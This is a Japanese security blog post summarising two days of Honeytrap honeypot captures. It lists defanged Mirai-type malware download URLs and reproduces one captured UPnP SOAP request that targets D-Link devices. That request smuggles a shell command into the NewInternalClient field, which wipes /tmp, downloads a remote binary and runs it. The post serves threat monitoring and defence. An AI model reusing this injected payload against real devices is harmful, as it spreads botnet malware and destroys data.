sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(243-244日目:4/13-4/14)

最近、食洗機を買ったのですが、組み立て途中で床に落として、床が凹み、食洗機にヒビが入りましたが、簡易分析をしたいと思います。

Honeytrap簡易分析(243-244日目:4/13-4/14)
※80ポートは除く

f:id:one-chick-sec:20190416010412p:plain

検知傾向としては特に検知数がスパイクしている箇所などはありませんでした。


<新規マルウェア

ポート マルウェアダウンロード先 HTTPリクエストパス VT 備考
8080 hxxp://134[.]209[.]226[.]252/vb/mpsl

POST /tmUnblock.cgi

VirusTotal

  
49152 hxxp://185[.]223[.]163[.]17/b POST /soap.cgi?service=WANIPConn1 

VirusTotal

 Mirai系

 
<気になった通信>
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Host: xxx.xxx.xxx.xxx:49152
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: Hello, World

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget hxxp://xxx[.]xxx[.]xxx[.]xxx/b;sh /tmp/mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>....

D-Link デバイスに存在するコード実行の脆弱性を狙った攻撃です。/tmp 配下のファイルを全て削除した後、Mirai系のマルウェアをダウンロードする流れで感染させるものでした。最近のIoT系を狙った攻撃は他のマルウェアを削除する傾向にあるかもしれません。
<参考URL>
https://www.exploit-db.com/exploits/28333

80ポートで収集しているWoWHoneypotも何か分析し、共有していこうと考え中です。簡易分析は以上となります。